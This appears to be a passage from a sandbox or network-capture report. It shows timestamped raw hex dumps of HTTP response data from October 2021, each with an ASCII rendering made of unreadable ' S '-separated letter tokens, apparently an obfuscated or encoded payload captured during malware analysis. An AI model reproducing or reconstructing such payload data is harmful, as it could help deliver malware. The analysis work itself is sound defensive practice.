                                                                                                2021-10-26 15:34:21 UTC1048INData Raw: 4d 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 6e 20 53 20 54 54 54 20 53 20 6e 4d 20 53 20 55 6e 20 53 20 69 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 6e 69 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 4d 20 53 20 55 50 20 53 20 55 70 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 54 53 54 20 53 20 54 53 70 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 54 53 50 20 53 20 69 55 20 53 20 4f 4f 20 53 20 55 54 20 53 20 54 53 70 20 53 20 4f 55 20 53 20 54 53 54 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 6e 69 20 53 20 50 4d 20 53 20 4f 55 20 53 20 70 50 20 53 20
                                                                                                Data Ascii: M S UT S pP S pP S Un S Un S TTT S nM S Un S ig S TSP S in S ni S TSg S pP S pP S TSp S UP S PT S PM S UP S Up S pn S nU S TSi S TST S TSp S PT S in S in S Pn S UT S TSP S iU S OO S UT S TSp S OU S TST S pP S nS S TSg S pP S pP S Pi S ni S PM S OU S pP S
                                                                                                2021-10-26 15:34:21 UTC1050INData Raw: 20 6e 54 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 6e 54 20 53 20 6e 70 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 55 54 20 53 20 70 70 20 53 20 6e 67 20 53 20 54 53 4f 20 53 20 50 6e 20 53 20 54 53 53 20 53 20 6e 4f 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 50 53 20 53 20 50 6e 20 53 20 54 53 53 20 53 20 6e 4f 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 4d 20 53 20 54 53 4f 20 53 20 54 53 53 20 53 20 6e 55 20 53 20 6e 4f 20 53 20 50 50 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 55 53 20 53 20 6e 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 50 20 53 20 69 55
                                                                                                Data Ascii: nT S TSg S Pp S UT S nn S On S TSg S nT S np S TMM S TTU S Pn S UT S pp S ng S TSO S Pn S TSS S nO S PP S in S in S PM S PS S Pn S TSS S nO S PP S in S in S PM S TSO S TSS S nU S nO S PP S in S in S ig S TSg S US S nn S TSg S pP S pP S TSp S UO S UP S iU
                                                                                                2021-10-26 15:34:21 UTC1051INData Raw: 6e 70 20 53 20 70 70 20 53 20 50 53 20 53 20 54 54 54 20 53 20 54 54 50 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 4d 20 53 20 55 50 20 53 20 55 50 20 53 20 55 6e 20 53 20 54 53 70 20 53 20 54 54 50 20 53 20 54 4d 54 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 50 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 70 50 20 53 20 54 4d 54 20 53 20 6e 53 20 53 20 50 53 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 4d 20 53 20 54 53 50 20 53 20 50 6e 20 53 20 50 50 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 69 6e 20 53 20 55 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 54 4f 20 53 20 69 4f 20 53 20 55 6e 20 53 20 6e 70 20 53 20 50 50 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 54 54
                                                                                                Data Ascii: np S pp S PS S TTT S TTP S TSp S UP S PM S UP S UP S Un S TSp S TTP S TMT S TSn S pP S pP S TSP S Pp S in S in S UP S pP S TMT S nS S PS S PT S UP S nM S TSP S Pn S PP S TTT S TSn S in S UU S in S in S iO S Pg S OU S TTO S iO S Un S np S PP S ng S nM S TT
                                                                                                2021-10-26 15:34:21 UTC1052INData Raw: 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 53 50 20 53 20 54 54 55 20 53 20 55 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 4f 53 20 53 20 55 54 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 53 4f 20 53 20 69 4f 20 53 20 54 53 50 20 53 20 55 53 20 53 20 55 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 70 20 53 20 50 67 20 53 20 54 53 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 53 54 20 53 20 54 4d 4d 20 53 20 6e 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 54 53 69 20 53 20 50 70 20 53 20 6e 6e 20 53 20 54 54 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53
                                                                                                Data Ascii: S pP S pP S ng S PS S nS S TSP S TTU S UU S in S in S iO S OS S UT S OS S TTT S TSO S iO S TSP S US S UU S in S in S ig S TSp S Pg S TST S TSg S pP S pP S TTT S TST S TMM S np S UT S pP S pn S ni S UM S TSM S TSP S TSi S Pp S nn S TTp S pP S pP S ng S US
                                                                                                2021-10-26 15:34:21 UTC1054INData Raw: 54 53 50 20 53 20 6e 54 20 53 20 54 53 54 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 70 20 53 20 54 53 4f 20 53 20 6e 55 20 53 20 54 53 69 20 53 20 55 4f 20 53 20 54 53 70 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 54 20 53 20 55 50 20 53 20 50 4d 20 53 20 54 54 55 20 53 20 54 53 4d 20 53 20 50 69 20 53 20 6e 67 20 53 20 55 55 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 53 54 20 53 20 55 6e 20 53 20 50 70 20 53 20 54 54 53 20 53 20 70 55 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 67 20 53 20 54 53 54 20 53 20 54 54 4f 20 53 20 54 54 4f 20 53 20 70 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 55 50 20 53 20 69 4f 20
                                                                                                Data Ascii: TSP S nT S TST S TSg S pP S pP S Un S Up S TSO S nU S TSi S UO S TSp S Pn S in S in S Pn S UT S UP S PM S TTU S TSM S Pi S ng S UU S ig S in S in S Pn S TST S Un S Pp S TTS S pU S Up S UO S TTU S TTP S TSg S TST S TTO S TTO S pn S TSg S pP S pP S UP S iO
                                                                                                2021-10-26 15:34:21 UTC1055INData Raw: 53 20 50 50 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 55 53 20 53 20 70 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 55 55 20 53 20 70 50 20 53 20 54 53 53 20 53 20 70 50 20 53 20 54 53 4f 20 53 20 6e 70 20 53 20 54 4d 53 20 53 20 54 53 55 20 53 20 70 70 20 53 20 55 55 20 53 20 50 69 20 53 20 6e 6e 20 53 20 6e 70 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 53 4d 20 53 20 55 55 20 53 20 54 53 55 20 53 20 54 54 55 20 53 20 6e 69 20 53 20 54 54 4f 20 53 20 54 53 67 20 53 20 55 54 20 53 20 70 50 20 53 20 55 70 20 53 20 55 4f 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 54 53 67 20 53 20 69 67 20 53 20 55 69 20 53 20 50 4d 20 53 20 54 53 67 20 53 20 54 53 54 20 53 20 54 4d 53 20 53 20 54 53
                                                                                                Data Ascii: S PP S TSi S OO S pP S pP S ng S US S pO S pU S ng S UU S pP S TSS S pP S TSO S np S TMS S TSU S pp S UU S Pi S nn S np S Pn S in S in S Pn S TSM S UU S TSU S TTU S ni S TTO S TSg S UT S pP S Up S UO S TTU S TTP S TSg S ig S Ui S PM S TSg S TST S TMS S TS
                                                                                                2021-10-26 15:34:21 UTC1059INData Raw: 55 55 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 55 50 20 53 20 55 4d 20 53 20 4f 6e 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 55 54 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 55 69 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 4d 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 6e 55 20 53 20 54 53 4d 20 53 20 70 55 20 53
                                                                                                Data Ascii: UU S pP S Un S UU S UP S UM S On S TTU S Pn S UT S On S np S pO S pP S pP S pP S pU S in S TSS S UT S TSp S in S nS S OS S TSp S pp S UT S pP S pU S in S TSS S UM S Ui S in S TSS S UM S pU S in S TSS S UT S TMM S in S TSS S UT S TSp S in S nU S TSM S pU S
                                                                                                2021-10-26 15:34:21 UTC1063INData Raw: 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 4f 6e 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 70 55 20 53 20 50 69 20 53 20 70 6e 20 53 20 50 70 20 53 20 54 53 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 55 70 20 53 20 54 53 54 20 53 20 54 53 50 20 53 20 70 50 20 53 20 70 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 67 20 53 20 50 70 20 53 20 55 54 20 53 20 6e 6e 20 53 20 4f 6e 20 53 20 55 53 20 53 20 55 50 20 53 20 70 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 69 4f 20 53 20 50 53 20 53 20 54 54 54 20 53 20 70 50 20 53 20 54 54 6e 20 53 20
                                                                                                Data Ascii: TSg S Pp S UT S nn S On S pP S pn S pP S pP S pP S pp S pU S Pi S pn S Pp S TST S pP S pP S pp S UT S Up S TST S TSP S pP S pU S pP S pP S pP S TSg S Pp S UT S nn S On S US S UP S pU S pP S pP S pU S in S TSS S TSi S pU S in S iO S PS S TTT S pP S TTn S
                                                                                                2021-10-26 15:34:21 UTC1064INData Raw: 20 53 20 55 53 20 53 20 54 54 54 20 53 20 6e 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 55 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 54 4d 53 20 53 20 6e 53 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 54 6e 20 53 20 6e 53 20 53 20 54 54 54 20 53 20 69 6e 20 53 20 70 50 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 50 53 20 53 20 70 4f 20 53 20 55 53 20 53 20 69 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 69 67 20 53 20 50 53 20 53 20 6e 69 20 53 20 55 4d 20 53 20 70 6e 20 53 20 55 54 20 53 20 55 54 20 53 20 55 4d 20 53 20 55 70 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 54 53 20 53 20 4f 53 20 53 20 55 54 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53
                                                                                                Data Ascii: S US S TTT S np S pP S pP S pn S pU S TMS S pP S TMS S nS S TSg S in S iU S ni S TSM S TTn S nS S TTT S in S pP S nn S pP S pP S US S Pn S PS S pO S US S in S UU S nn S ig S PS S ni S UM S pn S UT S UT S UM S Up S Un S nU S TTS S OS S UT S pn S pP S pP S
                                                                                                2021-10-26 15:34:21 UTC1069INData Raw: 53 20 6e 67 20 53 20 50 50 20 53 20 54 54 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 54 20 53 20 50 6e 20 53 20 55 54 20 53 20 6e 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 54 6e 20 53 20 50 67 20 53 20 54 4d 53 20 53 20 4f 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 50 69 20 53 20 6e 4d 20 53 20 54 4d 4d 20 53 20 54 54 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 55 6e 20 53 20 6e 55 20 53 20 54 54 6e 20 53 20 54 4d 54 20 53 20 54 53 69 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 69 20 53 20 50 69 20 53 20 6e 54 20
                                                                                                Data Ascii: S ng S PP S TTM S in S in S Pn S TTT S Pn S UT S nn S pP S pP S nS S Un S nU S TTn S Pg S TMS S On S pP S pP S pp S Ui S Pi S nM S TMM S TTM S in S in S Pn S TTT S pP S pP S UT S pP S pP S nS S Un S nU S TTn S TMT S TSi S OU S pP S pP S pp S Ui S Pi S nT
                                                                                                2021-10-26 15:34:21 UTC1073INData Raw: 53 20 54 54 54 20 53 20 54 53 50 20 53 20 6e 4f 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 6e 55 20 53 20 55 69 20 53 20 55 70 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 54 54 67 20 53 20 70 50 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 4f 20 53 20 69 6e 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 6e 4d 20 53 20 50 69 20 53 20 6e 4d 20 53 20 54 53 70 20 53 20 54 54 69 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 6e 20 53 20 55 69 20 53 20 55 50 20 53 20 69 4f 20 53 20 4f 53 20 53 20 55 6e 20 53 20 4f 6e 20 53 20 70 70 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 54 4d 53 20 53 20 69 67 20 53 20 54 53 69 20
                                                                                                Data Ascii: S TTT S TSP S nO S TTU S in S in S iO S nU S Ui S Up S TSU S OS S TTg S pP S TTU S Pn S iO S in S ng S TTU S nM S Pi S nM S TSp S TTi S in S in S Pn S Ui S UP S iO S OS S Un S On S pp S TSn S pO S pP S pP S pU S in S TSS S TSM S TMT S np S TMS S ig S TSi
                                                                                                2021-10-26 15:34:21 UTC1077INData Raw: 53 70 20 53 20 6e 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 54 53 69 20 53 20 50 54 20 53 20 6e 6e 20 53 20 54 4d 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 50 69 20 53 20 70 55 20 53 20 55 53 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 55 20 53 20 50 54 20 53 20 54 54 50 20 53 20 54 54 67 20 53 20 50 69 20 53 20 54 54 6e 20 53 20 54 54 69 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 54 54 6e 20 53 20 6e 53 20 53 20 50 67 20 53 20 55 53 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55 67 20 53 20 6e 55 20 53 20 55 4d 20 53 20 54 53 54 20 53 20 55
                                                                                                Data Ascii: Sp S nn S UT S pP S pn S ni S UM S TST S Ug S TSi S PT S nn S TMS S pP S pP S ng S TSU S nS S Pi S pU S US S pP S TSp S UU S PT S TTP S TTg S Pi S TTn S TTi S OS S TTT S TTn S nS S Pg S US S TSM S in S in S PS S On S ni S UM S TST S Ug S nU S UM S TST S U
                                                                                                2021-10-26 15:34:21 UTC1081INData Raw: 20 70 70 20 53 20 50 53 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 4f 20 53 20 69 6e 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 54 55 20 53 20 4f 6e 20 53 20 54 53 67 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 50 70 20 53 20 4f 53 20 53 20 4f 53 20 53 20 4f 4f 20 53 20 54 54 4f 20 53 20 50 54 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 70 20 53 20 54 54 54 20 53 20 50 4d 20 53 20 50 53 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 55 20 53 20 50 70 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 50 20 53 20 6e 6e 20 53 20 54 54 4f 20 53 20 55 50 20 53
                                                                                                Data Ascii: pp S PS S ni S TSM S Pn S iO S in S nO S TSP S TTU S On S TSg S pP S pP S nO S Pp S OS S OS S OO S TTO S PT S in S TSS S TSM S TMM S in S TSS S UT S TSp S TTT S PM S PS S TTT S pP S pP S nS S TSU S OS S in S PT S UU S Pp S in S TMS S UP S nn S TTO S UP S
                                                                                                2021-10-26 15:34:21 UTC1085INData Raw: 20 53 20 70 55 20 53 20 55 53 20 53 20 70 4f 20 53 20 54 53 67 20 53 20 54 53 67 20 53 20 54 53 53 20 53 20 55 53 20 53 20 54 53 50 20 53 20 6e 55 20 53 20 70 70 20 53 20 70 4f 20 53 20 54 53 69 20 53 20 55 54 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 70 20 53 20 55 70 20 53 20 6e 53 20 53 20 6e 6e 20 53 20 6e 53 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 55 4d 20 53 20 54 4d 4d 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 69 20 53 20 70 70 20 53 20 50 53 20 53 20 4f 6e 20 53 20 70 55 20 53 20 55 53 20 53 20 70 4f 20 53 20 55 4f 20 53 20 54 53 67 20 53 20 54 53 53 20 53 20 55 54 20 53 20 55 70 20 53 20 6e 67 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 69
                                                                                                Data Ascii: S pU S US S pO S TSg S TSg S TSS S US S TSP S nU S pp S pO S TSi S UT S Up S TTU S Pp S Up S nS S nn S nS S pP S pP S nS S OU S in S nS S UM S TMM S pp S UT S pP S pU S TTi S pp S PS S On S pU S US S pO S UO S TSg S TSS S UT S Up S ng S TSi S OO S pp S i
                                                                                                2021-10-26 15:34:21 UTC1089INData Raw: 6e 20 53 20 54 54 4f 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 6e 20 53 20 54 54 55 20 53 20 54 54 50 20 53 20 70 55 20 53 20 70 4f 20 53 20 55 54 20 53 20 55 54 20 53 20 70 70 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 6e 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 70 20 53 20 55 70 20 53 20 50 6e 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 50 20 53 20 55 53 20 53 20 6e 6e 20 53 20 54 4d 53 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 70 20 53 20 54 54 55 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 69 20 53 20 70 50 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 6e
                                                                                                Data Ascii: n S TTO S nn S UM S pp S pP S pP S pp S Un S TTU S TTP S pU S pO S UT S UT S pp S iO S pO S Un S TSg S pO S pP S UT S pP S pP S Up S TTU S Pp S Up S Pn S nn S pp S pP S pP S nP S US S nn S TMS S TSn S pO S pP S Up S TTU S Pn S iU S ni S pP S TMM S TTT S n
                                                                                                2021-10-26 15:34:21 UTC1093INData Raw: 20 50 70 20 53 20 50 6e 20 53 20 54 53 6e 20 53 20 55 50 20 53 20 6e 6e 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 55 20 53 20 50 67 20 53 20 6e 4d 20 53 20 55 50 20 53 20 55 69 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 6e 50 20 53 20 50 70 20 53 20 6e 54 20 53 20 6e 55 20 53 20 55 4d 20 53 20 70 55 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 54 53 4f 20 53 20 55 67 20 53 20 54 54 55 20 53 20 70 6e 20 53 20 69 55 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 70 55 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 53 69 20 53 20 50 67 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53 20 70 50 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 4f 53 20 53 20 50 6e 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 53 20 53
                                                                                                Data Ascii: Pp S Pn S TSn S UP S nn S pP S TTT S TTp S nU S Pg S nM S UP S Ui S TSP S iU S UU S OO S nP S Pp S nT S nU S UM S pU S TSp S in S TSO S Ug S TTU S pn S iU S TSM S TSg S pU S UM S TSM S TSi S Pg S pP S TSp S US S pP S TSi S TSM S OS S Pn S pP S TSp S US S
                                                                                                2021-10-26 15:34:21 UTC1096INData Raw: 70 4f 20 53 20 6e 67 20 53 20 55 55 20 53 20 50 53 20 53 20 54 53 4d 20 53 20 54 53 67 20 53 20 69 4f 20 53 20 54 54 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 54 54 70 20 53 20 6e 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 54 53 67 20 53 20 50 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 70 50 20 53 20 6e 4d 20 53 20 50 4d 20 53 20 55 55 20 53 20 54 53 50 20 53 20 50 70 20 53 20 4f 6e 20 53 20 4f 53 20 53 20 50 6e 20 53 20 50 54 20 53 20 69 55 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 6e 69 20 53 20 69 4f 20 53 20 70 55 20 53 20 55 6e 20 53 20 54 53 69 20 53 20 69 55 20 53 20 54 4d
                                                                                                Data Ascii: pO S ng S UU S PS S TSM S TSg S iO S TTT S iU S nn S TSi S pP S pP S nS S TSM S TTT S TTp S nT S pO S pP S pP S nS S TSU S OS S TSg S PT S iU S nn S pP S nM S PM S UU S TSP S Pp S On S OS S Pn S PT S iU S nn S TSi S TSS S ni S iO S pU S Un S TSi S iU S TM
                                                                                                2021-10-26 15:34:21 UTC1101INData Raw: 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 69 67 20 53 20 55 53 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 53 53 20 53 20 6e 53 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 69 6e 20 53 20 6e 67 20 53 20 69 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 69 20 53 20 55 54 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 50 4d 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 6e 67 20 53 20 69 55 20 53 20 70 4f 20 53 20 54 53 54 20 53 20 69 4f 20 53 20 70 55 20 53 20 54 54 54 20 53 20 54 54 50 20 53 20 54 53 55 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67
                                                                                                Data Ascii: P S ng S PS S nS S ig S US S TSM S in S in S iO S pU S TTT S TSS S nS S Pp S pP S pP S ng S TSU S nS S in S ng S iO S pO S pP S pP S ni S UT S TSp S UO S UU S PM S Pn S in S in S in S UP S ng S iU S pO S TST S iO S pU S TTT S TTP S TSU S Pp S pP S pP S ng
                                                                                                2021-10-26 15:34:21 UTC1105INData Raw: 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 6e 54 20 53 20 55 70 20 53 20 69 55 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 54 53 54 20 53 20 70 70 20 53 20 6e 67 20 53 20 69 55 20 53 20 55 50 20 53 20 70 50 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 55 70 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 50 20 53 20 70 55 20 53 20 69 67 20 53 20 54 54 55 20 53 20 69 67 20 53 20 6e 69 20 53 20 55 4d 20 53 20 54 53 4d 20 53 20 54 4d 54 20 53 20 6e 70 20 53 20 55 4d 20 53 20 54 53 69 20 53 20 55 4d 20 53 20 4f 53 20 53 20 54 53 50 20 53 20 55 70 20 53 20 55 4f 20 53 20 70 4f 20 53 20 54 53 70 20 53 20 55 55 20 53 20 50 4d 20 53 20 55 54 20 53 20 54 53
                                                                                                Data Ascii: S in S PT S UP S ng S TSP S in S pU S TTT S nT S Up S iU S pP S pP S ng S TTp S TST S pp S ng S iU S UP S pP S PM S TSU S Up S ig S pO S nP S pU S ig S TTU S ig S ni S UM S TSM S TMT S np S UM S TSi S UM S OS S TSP S Up S UO S pO S TSp S UU S PM S UT S TS
                                                                                                2021-10-26 15:34:21 UTC1109INData Raw: 20 53 20 69 6e 20 53 20 50 6e 20 53 20 6e 53 20 53 20 50 6e 20 53 20 6e 6e 20 53 20 54 53 53 20 53 20 6e 53 20 53 20 50 50 20 53 20 70 50 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 54 53 4d 20 53 20 54 53 50 20 53 20 6e 70 20 53 20 69 67 20 53 20 69 67 20 53 20 54 53 4f 20 53 20 4f 55 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 69 55 20 53 20 54 53 50 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 54 20 53 20 6e 54 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 69 55 20 53 20 54 54 53 20 53 20 70 50 20 53 20 6e 4d 20 53 20 55 50 20 53 20 54 53 67 20 53 20 6e 4f 20 53 20 55 70 20 53 20 50 54 20 53 20 50 70 20 53 20 54 53 53 20 53 20 55 54
                                                                                                Data Ascii: S in S Pn S nS S Pn S nn S TSS S nS S PP S pP S pO S pP S pP S pP S pn S ni S UU S TSM S TSP S np S ig S ig S TSO S OU S pP S pP S pP S pP S OS S TSp S iU S TSP S pP S nM S UT S nT S OS S TSp S iU S TTS S pP S nM S UP S TSg S nO S Up S PT S Pp S TSS S UT
